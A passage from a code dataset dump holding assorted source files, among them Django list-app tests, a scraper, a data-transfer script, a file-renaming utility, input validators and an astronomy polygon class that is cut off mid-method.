self.assertTemplateUsed(response, 'list.html')\n\n    def test_display_only_items_for_that_list(self):\n        correct_list_ = List.objects.create()\n        Item.objects.create(text='itemey 1', list=correct_list_)\n        Item.objects.create(text='itemey 2', list=correct_list_)\n\n        other_list = List.objects.create()\n        Item.objects.create(text='other list item 1', list=other_list)\n        Item.objects.create(text='other list item 2', list=other_list)\n\n        response = self.client.get('/lists/%d/' % (correct_list_.id,))\n\n        # request = HttpRequest()\n        # response = home_page(request)\n        # the two lines above were upgraded to the single line below\n        #response = self.client.get('/lists/the-only-list-in-the-world/')\n\n        self.assertContains(response, 'itemey 1')\n        self.assertContains(response, 'itemey 2')\n        self.assertNotContains(response, 'other list item 1')\n        self.assertNotContains(response, 'other list item 2')\n\n\nclass NewListTest(TestCase):\n\n    def test_can_save_a_POST_request(self):\n        self.client.post('/lists/new', data={'item_text': 'A new list item'})\n\n        self.assertEqual(Item.objects.count(), 1)\n        new_item = Item.objects.first()\n        self.assertEqual(new_item.text, 'A new list item')\n\n    def test_redirects_after_POST(self):\n        response = self.client.post('/lists/new', data={'item_text': 'A new list item'})\n        new_list = List.objects.first()\n        self.assertRedirects(response, '/lists/%d/' % (new_list.id,))\n\n\nclass NewItemTest(TestCase):\n\n    def test_can_save_a_POST_to_an_existing_list(self):\n        '''\n        Test that an Item POSTed to an existing list is saved.\n        1. Create a correct_list and an other_list\n        2. Call the add-Item POST endpoint with the new item's text\n        3. 
Assert: the Item count == 1\n           Assert: the first Item's text == the POSTed text\n           Assert: the first Item's list == correct_list\n        :return:\n        '''\n        other_list = List.objects.create()\n        correct_list = List.objects.create()\n        response = self.client.post('/lists/%d/add_item' % correct_list.id,\n                                    data={'item_text': 'A new item for an existing list'})\n\n        self.assertEqual(Item.objects.count(), 1)\n        new_item = Item.objects.first()\n        self.assertEqual(new_item.text, 'A new item for an existing list')\n        self.assertEqual(new_item.list, correct_list)\n\n    def test_redirects_to_list_view(self):\n        other_list = List.objects.create()\n        correct_list = List.objects.create()\n\n        response = self.client.post('/lists/%d/add_item' % correct_list.id,\n                                    data={'item_text': 'A new item for an existing list'})\n\n        self.assertRedirects(response, '/lists/%d/' % (correct_list.id,))\n\n    def test_passes_correct_list_to_template(self):\n        other_list = List.objects.create()\n        correct_list = List.objects.create()\n\n        response = self.client.get('/lists/%d/' % (correct_list.id,))\n        self.assertEqual(response.context['list'], correct_list)\n","sub_path":"lists/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75045362","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport grab\nfrom TechParser import parser\n\ndef get_articles():\n\tg = grab.Grab()\n\tparser.setup_grab(g)\n\t\n\tg.go('http://planet.clojure.in')\n\t\n\tcss_path = '.entry .article h2 a'\n\t\n\treturn parser.get_articles(g, css_path, css_path,\n\t\t'planetclojure', 'planet.clojure.in')\n","sub_path":"TechParser/planetclojure.py","file_name":"planetclojure.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486571958","text":"# coding=UTF-8\n\nfrom support.transfer.base import BaseTransfer\nfrom model.store.model_shop import Channel\n\nclass ChannelTransfer(BaseTransfer):\n\n    def base_sql(self):\n        if not hasattr(self, '_sql_str'):\n            self._sql_str = \"select * from ct_sale_channel where grade=0 and create_date between '2018-06-21 00:00:00' \\\n            and '2018-06-21 23:59:59'\"\n\n    def run(self):\n        self.base_sql()\n        current = 0\n        sql = self.generate_sql(current)\n        data_list = self.get_date_list(sql)\n        print(\"============\", sql)\n        while len(data_list) > 0:\n            print(\"============\", len(data_list))\n            channel_list = self.generate_date(data_list)\n            Channel.objects.bulk_create(channel_list)\n            current = current + 1\n            sql = self.generate_sql(current)\n            data_list = self.get_date_list(sql)\n\n        self.break_link()\n        print(\"==================Channel transfer finished successfully==================\")\n\n    def generate_date(self, data_list):\n        channel_list = []\n        for dic_data in data_list:\n            channel_qs = Channel.search(name = dic_data[\"name\"])\n            if channel_qs.count() == 0:\n                channel_list.append(Channel(name = dic_data[\"name\"], freight = 900, \\\n                    single_repair_money = int(dic_data[\"remoney\"] * 100) if dic_data[\"remoney\"] else 0, \\\n                    single_point_money = int(dic_data['bucmoney'] * 100) if dic_data[\"bucmoney\"] else 0, \\\n                    update_time = dic_data[\"modify_date\"], \\\n                    create_time = dic_data[\"create_date\"]))\n\n        return channel_list\n\n    def generate_sql(self, current, limit = 100):\n        return \"{s} limit {i},{l}\".format(s = self._sql_str, i = current * limit, l = 
limit)\n\n","sub_path":"codes/personal_backend/support/transfer/channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"129794116","text":"import os\n\nfrom settings import PROJECT_ROOT\nfrom mesgclsf.datapreptools import get_immediate_subfolders\n\nif __name__ == \"__main__\":\n ext_filter = ['.jpg', '.png']\n in1_dir = os.path.join(PROJECT_ROOT, 'Data', 'Step1', 'Training', 'Positive')\n in2_dir = os.path.join(PROJECT_ROOT, 'Data', 'Step2', 'Training')\n\n file_list1 = []\n for img_file1 in os.listdir(in1_dir):\n full_path_name1 = os.path.join(in1_dir, img_file1)\n if os.path.isfile(full_path_name1) and img_file1.lower().endswith(tuple(ext_filter)):\n file_list1.append(img_file1)\n\n file_list2 = []\n for sub_dir in get_immediate_subfolders(in2_dir):\n full_dir = os.path.join(in2_dir, sub_dir)\n for sub_dir2 in get_immediate_subfolders(full_dir):\n full_dir2 = os.path.join(full_dir, sub_dir2)\n\n for img_file2 in os.listdir(full_dir2):\n full_path_name2 = os.path.join(full_dir2, img_file2)\n if os.path.isfile(full_path_name2) and img_file2.lower().endswith(tuple(ext_filter)):\n file_list2.append(img_file2)\n\n diff21 = list(set(file_list2) - set(file_list1))\n print(\"Files in step2 and not in step1:\")\n for f21 in diff21:\n print(f21)\n\n diff12 = list(set(file_list1) - set(file_list2))\n print(\"Files in step1 and not in step2:\")\n for f12 in diff12:\n print(f12)","sub_path":"mesgclsf/filelistcomp.py","file_name":"filelistcomp.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369736445","text":"import os\r\nimport matplotlib.pyplot as plt\r\n\r\ntrain_losses = []\r\nmetrics = {'l2':[], 'l1':[], 'completeness':[], 'median error':[]}\r\n\r\nmodelname = 'mvsnet_large239'\r\nstart_epoch = int(modelname[12:])\r\nmetrics['l2'].append([])\r\nmetrics['l1'].append([])\r\nmetrics['completeness'].append([])\r\nmetrics['median error'].append([])\r\nwith open(os.path.join('debug/end2end_mvsnet_large_pretrain%d_1000/log_test_bak.txt'%start_epoch)) as f:\r\n for line in f:\r\n metrics['l2'][-1].append(float(line.rstrip().split()[-18]))\r\n metrics['l1'][-1].append(float(line.rstrip().split()[-3]))\r\n metrics['completeness'][-1].append(float(line.rstrip().split()[-8]))\r\n metrics['median error'][-1].append(float(line.rstrip().split()[-13]))\r\nwith open(os.path.join('logs', modelname+'.txt')) as f:\r\n for line in f:\r\n if 'average' not in line:\r\n continue\r\n train_losses.append(float(line.rstrip().split()[-1]))\r\n\r\nplt.style.use('bmh')\r\ntrain_epochs = len(train_losses)\r\nmin_epochs = min([len(loss) for loss in metrics['l2']])\r\nn_train_epoch = [i+1 for i in range(train_epochs)]\r\nn_epoch = [i*5+1 for i in range(min_epochs)]\r\nfig, ax1 = plt.subplots(1, 1)\r\nax1.plot(n_train_epoch, train_losses, 'black', label='train')\r\nax1.plot(n_epoch, metrics['l1'][0], linestyle='--', color='black', label='validation')\r\nax1.set_xlabel('number of epochs')\r\nax1.set_ylabel('loss')\r\nax1.legend()\r\nax1.grid(True)\r\nplt.savefig('debug/all_losses.png')","sub_path":"visualize_compare.py","file_name":"visualize_compare.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635546091","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom 
django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', include(\"dashboard.urls\")),\n    path('account/', include(\"account.urls\")),\n    path('api/', include(\"api.urls\")),\n]\n\nadmin.site.site_header = \"CHURCH - DATABASE ADMINISTRATOR\"\nadmin.site.index_title = \"TABLES\" \nadmin.site.site_title = 'Super User' \n\n\nif settings.DEBUG:\n    urlpatterns += static(settings.STATIC_URL,\n                          document_root=settings.STATIC_ROOT)\n    urlpatterns += static(settings.MEDIA_URL,\n                          document_root=settings.MEDIA_ROOT)","sub_path":"church_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430387216","text":"import os\n\ndef menu():\n\tprint(\"*\"*50)\n\tprint(\"          File management system\")\n\tprint(\"1: Add\")\n\tprint(\"2: Rename\")\n\tprint(\"3: Delete\")\n\tprint(\"*\"*50)\nmenu()\nfolder_name = input(\"Enter the folder to work on: \")\n\n# create a new folder from the user's input\ndef add_file():\n\tnew_name = folder_name\n\tos.mkdir(new_name)\n\tprint(\"Created folder %s\"%new_name)\n\t# create a few files\t\n\tcount = 1\n\twhile count <=10:\n\t\tmovie = open(new_name+\"\\\\\"+\"秦时明月-0%d.mp4\"%count,\"wb+\")\n\t\tcount +=1\t\t\t\t\t\t\n\tfile_num = os.listdir(new_name)\n\tprint(\"Created files: %s\"%file_num)\n\treturn file_num\n\n# rename the files in the given folder\ndef rename_file():\n#\tfolder_name = input(\"Enter the folder to rename: \")\n\t# change the working directory\n#\tos.chdir(folder_name)\n\t# rename\n\tfile_num = os.listdir(folder_name)\n\tfor name in file_num:\n\t\t#print(name)\t\n\t\told_file_name = folder_name+'\\\\'+name\n\t\tnew_file_name = folder_name+'\\\\'+\"[玄机出品]-\"+name\n\t\tos.rename(old_file_name,new_file_name)\n\tmovie_name = os.listdir(folder_name)\n\tfor movie in movie_name:\n\t\tprint(\"File name after renaming: %s\"%movie)\n\treturn folder_name,movie_name\n\ndef rmname_file():\n\trm_name = input(\"Enter the text to remove from file names: \")\n\t# strip the given text from each file name\n\tfile_num = os.listdir(folder_name)\n\tfor name in file_num:\n#\t\tprint(name)\n\t\tfile_name = folder_name+'\\\\'+name.replace(rm_name,'')\n\t\tprint(\"File name after deletion: %s\"%file_name)\n\t\tname = folder_name+'\\\\'+name\n\t\tos.rename(name,file_name)\n\nwhile True:\n\tnum=int(input(\"Enter an option number: \"))\n\n\tif num==1:\n\t\tadd_file()\n\t\tprint(\"Files added\")\n\telif num==2:\n\t\trename_file()\n\t\tprint(\"Renamed...\")\n\telif num==3:\n\t\trmname_file()\n\t\tprint(\"Names cleaned up...\")\n\telse:\n\t\tprint(\"Invalid input..\")\n","sub_path":"file/批量重命名.py","file_name":"批量重命名.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534962556","text":"from Node import Node\n\ndef ceilInBST(root, val):\n    res = -1\n    while root is not None:\n        if root.val == val:\n            # an exact match is the ceiling itself; stop searching\n            return root.val\n        elif root.val < val:\n            root = root.right\n        else:\n            res = root.val \n            root = root.left\n    return res\n\nroot = Node(5)\nroot.left = Node(3)\nroot.left.left = Node(2)\nroot.left.right = Node(4)\nroot.right = Node(7)\nroot.right.left = Node(6)\nroot.right.right = Node(9)\n\nitem = int(input('Enter search item: '))\nprint(ceilInBST(root, item))","sub_path":"Binary Search Tree/Ceil in BST.py","file_name":"Ceil in BST.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"625868651","text":"import os\n\nfrom cauldron import cli\nfrom cauldron import environ\nfrom cauldron.cli import sync\nfrom cauldron.environ.response import Response\nfrom cauldron.environ.response import ResponseMessage\n\nNAME = 'sync'\nDESCRIPTION = \"\"\"\n    
Synchronizes the remote cauldron connection with the most recent versions\n of the locally stored project files.\n \"\"\"\n\n\ndef do_synchronize(\n context: cli.CommandContext,\n source_directory: str,\n newer_than: float\n) -> Response:\n \"\"\" \"\"\"\n\n synchronized = []\n\n def on_progress(message: ResponseMessage):\n if message.kind == 'SKIP':\n return\n\n if len(synchronized) < 1:\n environ.log_header(\n text='SYNCHRONIZING',\n level=2,\n whitespace=1\n )\n\n if message.code == 'STARTED':\n synchronized.append(message)\n\n chunk_count = message.data.get('chunk_count', 0)\n\n if message.code == 'DONE' and chunk_count < 2:\n return\n\n message.console()\n\n sync_response = sync.files.send_all_in(\n directory=source_directory,\n remote_connection=context.remote_connection,\n newer_than=newer_than,\n progress_callback=on_progress\n )\n context.response.consume(sync_response)\n\n context.response.update(synchronized_count=len(synchronized))\n\n if len(synchronized) < 1:\n return context.response\n\n touch_response = sync.comm.send_request(\n endpoint='/sync-touch',\n method='GET',\n remote_connection=context.remote_connection\n )\n context.response.consume(touch_response)\n\n if not context.response.failed:\n environ.log('Synchronization Complete', whitespace=1)\n\n return context.response\n\n\ndef execute(context: cli.CommandContext) -> Response:\n \"\"\" \"\"\"\n\n if not context.remote_connection.active:\n return context.response.fail(\n code='NO_REMOTE_CONNECTION',\n message='No active remote connection is available. Nothing to sync.'\n ).console(\n whitespace=1\n ).response\n\n status_response = sync.comm.send_request(\n endpoint='/sync-status',\n method='GET',\n remote_connection=context.remote_connection\n )\n source_directory = status_response.data.get('remote_source_directory')\n source_path = os.path.join(\n source_directory if source_directory else '',\n 'cauldron.json'\n )\n\n if status_response.failed or not source_directory:\n status_response.log_notifications()\n return context.response.consume(status_response)\n\n directory_exists = os.path.exists(source_directory)\n definition_exists = os.path.exists(source_path)\n\n if not directory_exists or not definition_exists:\n return context.response.fail(\n code='NO_PROJECT',\n message='No project exists locally at: {}'.format(source_directory)\n ).console(\n whitespace=1\n ).response\n\n sync_response = do_synchronize(\n context=context,\n source_directory=source_directory,\n newer_than=status_response.data.get('sync_time', 0)\n )\n\n return context.response.consume(sync_response)\n","sub_path":"cauldron/cli/commands/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258576694","text":"# #best solution\n# class Solution:\n# def dominantIndex(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# if len(nums) <= 1:\n# return 0\n# m = max(nums)\n# ind = nums.index(m)\n# del nums[ind]\n# m_2 = max(nums)\n# return ind if m >= 2*m_2 else -1\n\nclass Solution:\n def dominantIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n firstBig = 0\n secondBig = 0\n thatIndex = 0\n \n for index,item in enumerate(nums):\n if item > firstBig:\n secondBig = firstBig\n firstBig = item\n thatIndex = index\n elif item > secondBig:\n secondBig = item\n \n if len(nums) == 1:\n return 0\n elif firstBig >= 2*secondBig:\n return thatIndex\n else:\n return 
-1","sub_path":"array_largestNumberAtLeastTwiceOfOthers.py","file_name":"array_largestNumberAtLeastTwiceOfOthers.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"432511029","text":"import logging\nimport re\n\n\n# TeamRome\ndef check_input_str(string: str, title=True) -> str or None:\n    \"\"\" pattern: one or two words; words with Russian and English letters,\n    apostrophes, hyphenated double words, words with digits \"\"\"\n    if re.match(\"^[a-zA-Zа-яА-Я0-9'-_]{1,100}[ ]?[-]?[a-zA-Zа-яА-Я0-9'-_]{0,100}$\", string):\n        print(\"check_input_str(): %s\" % string)\n        if title:\n            return string.title()\n        else:\n            return string\n    else:\n        logging.error(\"check_input_str() Fail: %s\" % string)\n        return None\n\n\n# TeamRome\ndef check_telegram(string: str) -> str or None:\n    \"\"\" pattern: @tele, @123qwe, @qwe12, @asd11_sd1 \"\"\"\n    if re.match(\"^[@][a-zA-Zа-яА-Я_0-9]{1,100}$\", string):\n        print(\"check_telegram(): %s\" % string)\n        return string\n    else:\n        logging.error(\"check_telegram() Fail: %s\" % string)\n        return None\n\n\n# TeamRome\ndef check_home_number(string: str) -> str or None:\n    \"\"\" pattern: 12/4, 13-4, 1a, f/2, 5/e, 6-y \"\"\"\n    if re.match(\"^[0-9a-zA-Zа-яА-Я/-]{1,10}$\", string):\n        print(\"check_home_number(): %s\" % string)\n        return string\n    else:\n        logging.error(\"check_home_number() Fail: %s\" % string)\n        return None\n\n\n# TeamRome\ndef check_phone(phone: str) -> str or None:\n    \"\"\" pattern: +375291234567 \"\"\"\n    if re.match(\"^[+][0-9]{1,20}$\", phone):\n        print(\"check_phone(): %s\" % phone)\n        return phone\n    else:\n        logging.error(\"check_phone() Fail: %s\" % phone)\n        return None\n\n\n# TeamRome\ndef check_if_str(string: str, out: str or None) -> str:\n    print(\"check_if_str()\")\n    if string:\n        return string\n    else:\n        return out\n","sub_path":"client/edit/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"596909951","text":"\nimport math\nfrom typing import Union\n\nimport starlink\nimport starlink.Ast as Ast\nimport astropy.units as u\nimport astropy\nimport numpy as np\n\nfrom .region import ASTRegion\nfrom ..mapping import ASTMapping\nfrom ..mapping import ASTFrame, ASTSkyFrame\nfrom ..exc import FrameNotFoundException\n\n__all__ = [\"ASTPolygon\"]\n\nclass ASTPolygon(ASTRegion):\n\t\n\tdef __init__(self, ast_object:starlink.Ast.Polygon=None, frame:Union[ASTFrame, starlink.Ast.Frame]=None, points=None, fits_header=None):\n\t\t'''\n\t\tASTPolygon is an ASTRegion that represents a polygon, a collection of vertices on a sphere in a 2D plane.\n\n\t\tAccepted signatures for creating an ASTPolygon:\n\t\t\n\t\tp = ASTPolygon(frame, points)\n\t\tp = ASTPolygon(fits_header, points) # get the frame from the FITS header provided\n\t\tp = ASTPolygon(ast_object) # where ast_object is a starlink.Ast.Polygon object\n\n\t\tPoints may be provided as a list of coordinate points, e.g.\n\t\t\t[(x1, y1), (x2, y2), ... 
, (xn, yn)]\n\t\tor as two parallel arrays, e.g.\n\t\t\t[[x1, x2, x3, ..., xn], [y1, y2, y3, ..., yn]]\n\t\t\n\t\t:param ast_object: Create a new ASTPolygon from an existing :class:`starlink.Ast.Polygon` object.\n\t\t:param frame: The frame the provided points lie in, accepts either ASTFrame or starlink.Ast.Frame objects.\n\t\t:param points: Points (in degrees if frame is a SkyFrame) that describe the polygon, may be a list of pairs of points or two parallel arrays of axis points.\n\t\t:returns: Returns a new ASTPolygon object.\n\t\t'''\n\t\t\n\t\tif ast_object:\n\t\t\tif any([frame, points, fits_header]):\n\t\t\t\traise ValueError(\"ASTPolygon: Cannot specify 'ast_object' along with any other parameter.\")\n\t\t\t# test object\n\t\t\tif isinstance(ast_object, starlink.Ast.Polygon):\n\t\t\t\tsuper().__init__(ast_object=ast_object)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\traise Exception(\"ASTPolygon: The 'ast_object' provided was not of type starlink.Ast.Polygon.\")\n\n\t\tif points is None:\n\t\t\traise Exception(\"A list of points must be provided to create a polygon. This doesn't seem like an unreasonable request.\")\n\n\t\t# Get the frame from the FITS header\n\t\tif fits_header:\n\t\t\tif frame is not None:\n\t\t\t\traise ValueError(\"ASTPolygon: Provide the frame via the 'frame' parameter or the FITS header, but not both.\")\n\t\t\t\n\t\t\tfrom ..channel import ASTFITSChannel\n\t\t\tframe_set = ASTFrameSet.fromFITSHeader(fits_header=fits_header).baseFrame # raises FrameNotFoundException\n\t\t\n\t\tif isinstance(frame, starlink.Ast.Frame):\n\t\t\tast_frame = frame\n\t\telif isinstance(frame, ASTFrame):\n\t\t\tast_frame = frame.astObject\n\t\telse:\n\t\t\traise Exception(\"ASTPolygon: The supplied 'frame' object must either be a starlink.Ast.Frame or ASTFrame object.\")\n\t\t\n\t\tif isinstance(frame, (starlink.Ast.SkyFrame, ASTSkyFrame)):\n\t\t\tpoints = np.deg2rad(points)\n\t\t\n\t\t# The problem with accepting both forms is that the case of two points is ambiguous:\n\t\t# [[x1,x2], [y1, y2]]\n\t\t# [(x1,y1), (x2, y2}]\n\t\t# I'm going to argue that two points does not a polygon make.\n\t\tif len(points) == 2 and len(points[0]) == 2:\n\t\t\traise Exception(\"There are only two points in this polygon, making the point ordering ambiguous. But is it really a polygon?\")\n\t\t\n\t\t# Internally, the starlink.Ast.Polygon constructor takes the parallel array form of points.\n\t\t# starlink.Ast.Polygon( ast_frame, points, unc=None, options=None )\n\n\t\tparallel_arrays = not (len(points[0]) == 2)\n\t\t\n\t\tif parallel_arrays:\n\t\t\tself.astObject = Ast.Polygon(ast_frame, points)\n\t\telse:\n\t\t\tif isinstance(points, np.ndarray):\n\t\t\t\tself.astObject = Ast.Polygon(ast_frame, points.T)\n\t\t\telse:\n\t\t\t\t# Could be a list or lists or tuples - reshape into parallel array form\n\t\t\t\tdim1 = np.zeros(len(points))\n\t\t\t\tdim2 = np.zeros(len(points))\n\t\t\t\tfor idx, (x, y) in points:\n\t\t\t\t\tdim1[idx] = x\n\t\t\t\t\tdim2[idx] = y\n\t\t\t\t\n\t\t\t\tself.astObject = Ast.Polygon(ast_frame, np.array([dim1, dim2]))\n\t\n\t@staticmethod\n\tdef fromPointsOnSkyFrame(radec_pairs:np.ndarray=None, ra=None, dec=None, system:str=None, skyframe:ASTSkyFrame=None, expand_by=20*u.pix): # astropy.coordinates.BaseRADecFrame\n\t\t'''\n\t\tCreate an ASTPolygon from an array of points. 
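A minimal usage\n\t\tsketch (the values are illustrative and ``frame`` is an existing ASTSkyFrame):\n\t\t\n\t\t    poly = ASTPolygon.fromPointsOnSkyFrame(ra=[10.0, 10.2, 10.1],\n\t\t                                           dec=[41.0, 41.1, 41.3],\n\t\t                                           skyframe=frame)\n\t\t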
NOTE: THIS IS SPECIFICALLY FOR SKY FRAMES.\n\t\t\n\t\t:param ra: list of RA points, must be in degrees (or :class:`astropy.units.Quantity` objects)\n\t\t:param dec: list of declination points, must be in degrees (or :class:`astropy.units.Quantity` objects)\n\t\t:param system: the coordinate system, see cornish.constants for accepted values\n\t\t:param frame: the frame the points lie in, specified as an ASTSkyFrame object\n\t\t:returns: new ASTPolygon object\n\t\t'''\n\t\t# author: David Berry\n\t\t#\n\t\t# This method uses astConvex to find the shortest polygon enclosing a\n\t\t# set of positions on the sky. The astConvex method determines the\n\t\t# required polygon by examining an array of pixel values, so we first\n\t\t# need to create a suitable pixel array. An (M,M) integer array is first\n\t\t# created and initialised to hold zero at every pixel. A tangent plane\n\t\t# projection is then determined that maps the smallest circle containing\n\t\t# the specified (RA,Dec) positions onto the grid of (M,M) pixels. This\n\t\t# projection is then used to convert each (RA,Dec) position into a pixel\n\t\t# position and a value of 1 is poked into the array at each such pixel\n\t\t# position. The astConvex method is then used to determine the shortest\n\t\t# polygon that encloses all pixels that have value 1 in the array.\n\t\t#\n\t\t# This polygon is then modified by moving each vertex 20 pixels radially\n\t\t# away from the centre of the bounding disc used to define the extent of\n\t\t# the pixel grid.\n\t\t#\n\t\t# Finally, the resulting polygon is mapping from pixel coordinates to\n\t\t# (RA,Dec).\n\t\t\n\t\t# Set the required positional accuracy for the polygon vertices, given\n\t\t# as an arc-distance in radians. The following value corresponds to 10\n\t\t# arc-seconds. The size of the array (M) is selected to give pixels\n\t\t# that have this size. Alternatively, specify a non-zero value for M\n\t\t# explicitly, in which case the pixel size will be determined from M.\n\t\tACC = 4.85E-5\n\t\tM = 0\n\t\t\n\t\t# A SkyFrame describing the (RA,Dec) values.\n\t\t#skyfrm = Ast.SkyFrame( \"System=FK5,Equinox=J2000,Epoch=1982.0\" )\n\t\t\n\t\t# The RA values (radians).\n# \t\tra_list = [ 0.1646434, 0.1798973, 0.1925398, 0.2024329, 0.2053291,\n# \t\t 0.1796907, 0.1761278, 0.1701603, 0.1762123, 0.1689954,\n# \t\t 0.1725925, 0.1819018, 0.1865827, 0.19369, 0.1766037 ]\n# \t\t\n# \t\t# The Dec values (radians).\n# \t\tdec_list = [ 0.6967545, 0.706133, 0.7176528, 0.729342, 0.740609,\n# \t\t 0.724532, 0.7318467, 0.7273944, 0.7225725, 0.7120513,\n# \t\t 0.7087136, 0.7211723, 0.7199059, 0.7268493, 0.7119532 ]\n\n\t\t# .. 
todo:: handle various input types (np.ndarray, Quantity)\n\t\tif isinstance(skyframe, (ASTSkyFrame, Ast.SkyFrame)):\n\t\t\t# if it's a sky frame of some kind, we will expect degrees\n\t\t\tra = np.deg2rad(ra)\n\t\t\tdec = np.deg2rad(dec)\n\t\t\t\n\t\tra_list = ra\n\t\tdec_list = dec\n\t\t\t\t\n\t\t# convert frame parameter to an Ast.Frame object\n\t\tif isinstance(skyframe, ASTFrame):\n\t\t\tskyframe = skyframe.astObject\n\t\telif isinstance(skyframe, Ast.Frame):\n\t\t\tpass\n\t\telse:\n\t\t\traise ValueError(f\"The 'skyframe' parameter must be either an Ast.SkyFrame or ASTSkyFrame object; got {type(skyframe)}\")\n\t\t\n\t\t# Create a PointList holding the (RA,Dec) positions.\n\t\tplist = Ast.PointList( skyframe, [ra_list, dec_list] )\n\t\t\n\t\t# Get the centre and radius of the circle that bounds the points (in\n\t\t# radians).\n\t\t(centre,radius) = plist.getregiondisc()\n\t\t\n\t\t# Determine the number of pixels (M) along each side of the grid that\n\t\t# will produce pixels equal in size to ACC. If a non-zero value for M\n\t\t# has already been set, use it.\n\t\tif M == 0 :\n\t\t    M = int( 1 + 2.0*radius/ACC )\n\t\t#logger.debug(f\"Using grid size {M}\")\n\t\t\n\t\t# Create a minimal set of FITS-WCS headers that describe a TAN\n\t\t# projection that projects the above circle into a square of M x M\n\t\t# pixels. The reference point is the centre of the circle and is put\n\t\t# at the centre of the square grid. Put the headers into a FitsChan.\n\t\tfc = Ast.FitsChan()\n\t\tfc[\"NAXIS1\"] = M\n\t\tfc[\"NAXIS2\"] = M\n\t\tfc[\"CRPIX1\"] = 0.5*( 1 + M )\n\t\tfc[\"CRPIX2\"] = 0.5*( 1 + M )\n\t\tfc[\"CRVAL1\"] = centre[0]*Ast.DR2D\n\t\tfc[\"CRVAL2\"] = centre[1]*Ast.DR2D\n\t\tfc[\"CDELT1\"] = 2.0*radius*Ast.DR2D/( M - 1 )\n\t\tfc[\"CDELT2\"] = 2.0*radius*Ast.DR2D/( M - 1 )\n\t\tfc[\"CTYPE1\"] = 'RA---TAN'\n\t\tfc[\"CTYPE2\"] = 'DEC--TAN'\n\t\t\n\t\t# Re-wind the FitsChan and read the FrameSet corresponding to the above\n\t\t# FITS headers.\n\t\tfc.clear(\"Card\")\n\t\twcs = fc.read()\n\t\t\n\t\t# Use this FrameSet to transform all the (RA,Dec) positions into pixel\n\t\t# coordinates within the grid.\n\t\t( x_list, y_list ) = wcs.tran( [ra_list, dec_list], False )\n\t\t\n\t\t# Create an integer numpy array of the same shape, filled with zeros.\n\t\tar = np.zeros( shape=(M,M), dtype=int )\n\t\t\n\t\t# Poke a value 1 into the above array at each pixel position, checking\n\t\t# each such position is inside the array.\n\t\tfor (x,y) in zip( x_list, y_list ):\n\t\t    ix = int( round( x ) )\n\t\t    iy = int( round( y ) )\n\t\t    if ix >= 1 and ix <= M and iy >= 1 and iy <= M:\n\t\t        ar[ iy - 1, ix - 1 ] = 1\n\t\t\n\t\t# Create a Polygon representing the convex hull that encloses the\n\t\t# positions. This Polygon is defined in pixel coordinates within the\n\t\t# grid defined by the above FITS headers.\n\t\tpix_poly = Ast.convex( 1, Ast.EQ, ar, [1,1], [M,M], False )\n\t\t\n\t\t\n\t\tif expand_by.to_value(u.pix) > 0:\n\t\t\t# Now expand the above polygon a bit. First get the vertex positions\n\t\t\t# from the Polygon.\n\t\t\t(x_list, y_list ) = pix_poly.getregionpoints()\n\t\t\t\n\t\t\t# Transform the centre position from sky to pixel coordinates.\n\t\t\t( x_cen, y_cen ) = wcs.tran( [[centre[0]], [centre[1]]], False )\n\t\t\t\n\t\t\t# For each vertex, extend its radial vector by ``expand_by`` pixels\n\t\t\t# (20 by default). Create lists\n\t\t\t# of extended x and y vertex positions. 
[Expanding about the centroid of\n\t\t\t# the original vertices may give better results than expanding about the\n\t\t\t# centre of the bounding disc in some cases].\n\t\t\tx_new = []\n\t\t\ty_new = []\n\t\t\tfor (x,y) in zip( x_list, y_list ):\n\t\t\t    dx = x - x_cen[0]\n\t\t\t    dy = y - y_cen[0]\n\t\t\t    old_radius = math.sqrt( dx*dx + dy*dy )\n\t\t\t    # grow each vertex radially by the requested number of pixels\n\t\t\t    new_radius = old_radius + expand_by.to_value(u.pix)\n\t\t\t    factor = new_radius/old_radius\n\t\t\t    dx *= factor\n\t\t\t    dy *= factor\n\t\t\t    x_new.append( dx + x_cen[0] )\n\t\t\t    y_new.append( dy + y_cen[0] )\n\t\t\n\t\t\t# Create a new polygon in pixel coordinates using the extended vertex positions.\n\t\t\tbig_poly = Ast.Polygon( wcs.getframe( Ast.BASE ), [ x_new, y_new ] )\n\t\t\t\n\t\t\t# Transform the Polygon into (RA,Dec).\n\t\t\tnew_ast_polygon = big_poly.mapregion( wcs, skyframe )\n\t\t\n\t\telse:\n\t\t\t# Transform the Polygon into (RA,Dec)\n\t\t\tnew_ast_polygon = pix_poly.mapregion( wcs, skyframe )\n\t\t\n\t\treturn ASTPolygon(ast_object=new_ast_polygon)\n\t\t\n\t\n\tdef 